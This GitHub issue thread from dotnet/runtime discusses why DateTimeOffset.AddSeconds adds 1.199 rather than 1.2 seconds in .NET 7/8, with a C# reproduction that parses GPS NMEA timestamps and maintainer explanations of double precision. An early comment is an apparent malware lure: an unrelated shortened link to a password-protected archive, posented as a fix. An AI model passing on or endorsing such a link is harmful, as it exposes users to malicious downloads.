### ISSUE TITLE
"Enhanced precision" of DateTimeOffset Add methods results in incorrect value

### ISSUE THREAD

**Issue by justinswork** [dotnet/runtime#108362] opened 2024-09-29 02:39 UTC
### Description

The changes that were made to the `AddSeconds` method for enhanced precision result in bugs where the expected seconds and milliseconds are not added.

The change was introduced in this PR (.NET 7)  https://github.com/dotnet/runtime/pull/73198

The documentation has been updated to read as follows (from https://learn.microsoft.com/en-us/dotnet/api/system.datetime.addseconds?view=net-6.0#remarks)
`In .NET 6 and earlier versions, the
value
parameter is rounded to the nearest millisecond. In .NET 7 and later versions, the full
[Double](https://learn.microsoft.com/en-us/dotnet/api/system.double?view=net-6.0)
precision of the
value
parameter is used. However, due to the inherent imprecision of floating point math, the resulting precision will vary.`

However, for many simple values, (1.2, 1.4, 2.3, 2.4, 2.8... and many more) the resulting `DateTimeOffset` is just simply incorrect.

### Reproduction Steps

Create a new `DateTimeOffset` and call `.AddSeconds(1.2)`

### Expected behavior

 In .NET 6, it would add 1 second and 200 milliseconds

### Actual behavior

In .NET 8, it adds 1 second and 199 milliseconds

### Regression?

This works 100% consistently in .NET 6, and fails 100% consistently in .NET 7/8

### Configuration

Running on .NET 7/x64

**Comment by SagarChandra07** [comment] 2024-09-29 02:46
I think this will help you.
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler

**Comment by huoyaoyuan** [comment] 2024-09-29 06:47
Duplicate of #80549 and #91820.

**Comment by huoyaoyuan** [comment] 2024-09-29 07:02
It's more correct because `1.2` is actually `1.1999999999999999555910790149937383830547332763671875` in `double`. You can see this with `ToString("F100")` prints more precision of numbers.

**Comment by justinswork** [comment] 2024-09-30 12:10
I understand that it may be technically more correct, but to me this just seems like an example of making a very rare edge case work better at the expense of the common/happy path. I would consider this a breaking change (because it definitely is in my application). Was there any consideration given to possibly adding an overload, either for this new behavior or to retain the old behavior?

**Comment by tarekgh** [comment] 2024-09-30 15:58
@justinswork We have no plans to introduce such overloads, as they would likely confuse users who may struggle to determine which one to use for different behaviors in the same calculation. The `DateTimeOffset` class already provides the `Add(TimeSpan)` method, which allows you to control the precision of the value you want to add. In .NET 9.0, we've introduced overloads for `TimeSpan` that enable the creation of `TimeSpan` objects using integer values for seconds, milliseconds, etc. This approach gives you complete control overachieving the desired result. You can find more details here: [Adding TimeSpan.From overloads in .NET 9.0](https://github.com/dotnet/release-notes-drafts/blob/main/9.0/preview3/libraries.md#adding-timespanfrom-overloads).

Please let us know if you have any more questions or if it is ok to close this issue. Thanks!

CC @tannergooding

**Comment by tannergooding** [comment] 2024-09-30 16:06
> I understand that it may be technically more correct, but to me this just seems like an example of making a very rare edge case work better at the expense of the common/happy path

It's not making an edge case work better at the expense of a common/happy path. It's about fixing a clear bug that existed. Some of the places "regressed", like you gave examples for, but there are equally as many as cases given in other similar threads that have been fixed by the same change. In all cases however, the resulting value is now more accurate to the actual user input (which is not necessarily the same as the user "intent", but there is no way to determine that).

Binary floating-point numbers can only represent values that are a multiple of some power of two. This means that the values you write as literals are often not the actual value represented and this can lead to various quirks and loss of precision in some edge cases. This means literals like `0.1`, `1.2`, `2.3`, etc are not actually those values and users need to account for that in their code. In many cases they already had potential for bugs and simply didn't know it. If you want exact control, the new overloads that work with integers should be preferred instead and will often also be more performant as @tarekgh mentioned above.

**Comment by justinswork** [comment] 2024-09-30 16:49
@tarekgh @tannergooding thank you for your detailed explanations. It seems like this issue is just going to be closed, but I just want to spell out the exact scenario I am seeing and how this comes across as a bug.

I have a list of strings that represent NMEA messages recorded by a GPS https://www.gpsworld.com/what-exactly-is-gps-nmea-data/

```"$GPRMC,141825.0,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*56",
"$GPRMC,141825.2,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*54",
"$GPRMC,141825.4,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*52",
"$GPRMC,141825.6,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*50",
"$GPRMC,141825.8,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*5E",
```

For those unfamiliar with the message format, the first value "GPRMC" is the type of message, followed by the message timestamp. Notice how the timestamps for these GPS messages are clearly exactly 0.2 seconds apart (this is a 5 Hz GPS)

The library we are using for parsing these messages is https://github.com/dotMorten/NmeaParser
The exact parsing for the timestamp (and where the bug happens) is here https://github.com/dotMorten/NmeaParser/blob/91d0a73cd29cb1a262532fef25baf1f45d1b64ce/src/NmeaParser/Nmea/Rmc.cs#L50

I have written a small console app that reproduces this behavior

```
using System.Globalization;
namespace ConsoleApp1
{
	public class Program
	{
		static void Main()
		{
			var messages = new List<string>()
			{
				"$GPRMC,141825.0,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*56",
				"$GPRMC,141825.2,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*54",
				"$GPRMC,141825.4,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*52",
				"$GPRMC,141825.6,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*50",
				"$GPRMC,141825.8,A,4249.92297,N,08548.52186,W,000.01,227.1,040322,005.5,W*5E",
			};

			var parsedTimestamps = new List<DateTimeOffset>();
			foreach (var message in messages)
			{
				var messageParts = message.Split(',')[1..];
				parsedTimestamps.Add(ParseTimestampFromMessage(messageParts));
			}

			for (int i = 1; i < parsedTimestamps.Count; i++)
			{
				var diff = (parsedTimestamps[i] - parsedTimestamps[i - 1]).TotalSeconds;
				Console.WriteLine(diff);
			}
		}

		private static DateTimeOffset ParseTimestampFromMessage(string[] messageParts)
		{
			var year = int.Parse(messageParts[8].Substring(4, 2), CultureInfo.InvariantCulture) + 2000;
			var month = int.Parse(messageParts[8].Substring(2, 2), CultureInfo.InvariantCulture);
			var day = int.Parse(messageParts[8].Substring(0, 2), CultureInfo.InvariantCulture);
			var hour = int.Parse(messageParts[0].Substring(0, 2), CultureInfo.InvariantCulture);
			var minute = int.Parse(messageParts[0].Substring(2, 2), CultureInfo.InvariantCulture);
			var seconds = 0; //Constructor only takes an integer for seconds
			var actualSeconds = double.Parse(messageParts[0].Substring(4), CultureInfo.InvariantCulture);
			var FixTime = new DateTimeOffset(year,
				month,
				day,
				hour,
				minute,
				seconds, TimeSpan.Zero).AddSeconds(actualSeconds);

			return FixTime;
		}
	}
}
```

Output in .NET 6
```
0.2
0.2
0.2
0.2
```
Output in .NET 8
```
0.1999999
0.2
0.2000001
0.2
```

Does anybody have any suggestions for how this could be improved? I don't really blame the NMEA parsing library, because it's just parsing the values exactly as they are written in the file. It doesn't seem like there's any way I can use `decimal` here instead of `double`...

**Comment by tarekgh** [comment] 2024-09-30 17:34
Is it possible to manually parse the values using decimal and convert the parsed values to ticks and add the ticks to the DateTimeOffset object? Something like `double.Parse(messageParts[0].Substring(4), CultureInfo.InvariantCulture) * TimeSpan.TicksPerSecond`. Or you have to [NmeaParser](https://github.com/dotMorten/NmeaParser) for complete parsing?

**Comment by tannergooding** [comment] 2024-09-30 17:36
You're going to potentially have problems as long as you're using `double` to parse out the data and are expecting "exact" results.

You would need to use something like `decimal`, which would come with a perf hit, if you need things to better match your expectations of the given timings. Alternatively, you could break the value into integral and fractional portions by splitting on the decimal. So basically split on decimal, parse first portion add seconds; parse second portion (accounting for leading zeros) and add milliseconds or microseconds. Several ways you could handle it, but it all comes down to working with not using `double` which will always introduce some level of imprecision

**Comment by justinswork** [comment] 2024-09-30 17:44
I think I'm just struggling with how you both keep pointing out that we essentially shouldn't be using `double`, but yet there's no overload on the `DateTimeOffset` that allows me to use `decimal`!


> We have no plans to introduce such overloads, as they would likely confuse users who may struggle to determine which one to use for different behaviors in the same calculation.

I don't think I agree with this sentiment. It seems very difficult to "accidentally" use `decimal` instead of `double` and an overload that allows users who know they explicitly want the precision that `decimal` allows seems like it should be a very simple change.

**Comment by justinswork** [comment] 2024-09-30 17:57
@tarekgh I would probably use the `decimal.Parse` in the NmeaParser that you suggested, except `AddTicks` takes a `long`, so I guess I would just have to cast the `decimal` to a `long`

@tannergooding splitting on the decimal might work. I'd have to double check the exact spec of Nmea messages, but like you mentioned, leading/trailing zeroes makes it a little more difficult to ensure that you always converting the millisecond portion correctly. (25.2 splits into 25 and 2, so I could multiply the 2 * 100, but if it's 25.20, then that wouldn't work)

Just seems like awkward workarounds for the fact that I'm just not allowed to use `decimal` even though that's what everyone's saying should be used instead 🤷‍♂️

**Comment by justinswork** [comment] 2024-09-30 18:20
Also by the way, @tarekgh it looks like the comments in `DateTimeOffset.cs` are still out of date.

```
// Returns the DateTimeOffset resulting from adding a fractional number of
// seconds to this DateTimeOffset. The result is computed by rounding the
// fractional number of seconds given by value to the nearest
// millisecond, and adding that interval to this DateTimeOffset. The
// value argument is permitted to be negative.
//
```

https://source.dot.net/System.Private.CoreLib/R/b1f3371f1ec3f990.html

**Comment by tarekgh** [comment] 2024-09-30 18:51
Thanks @justinswork. We can update the internal comments as needed but it is low priority compared to the public docs https://learn.microsoft.com/en-us/dotnet/api/system.datetimeoffset.addseconds?view=net-8.0. If you think of a better way to enhance the public docs too, we are open to that. 

I am closing this issue. If you still want to propose the new overloads that takes decimal, you may log a new issue specific to this ask and follow the steps https://github.com/dotnet/runtime/blob/main/docs/project/api-review-process.md#steps. We may wait to see if there is a demand for that to consider it or have alternatives. 

Feel free to reply here if you still have anu questions or asks.

**Closed by tarekgh** 2024-09-30 18:51 UTC
Labels: area-System.DateTime
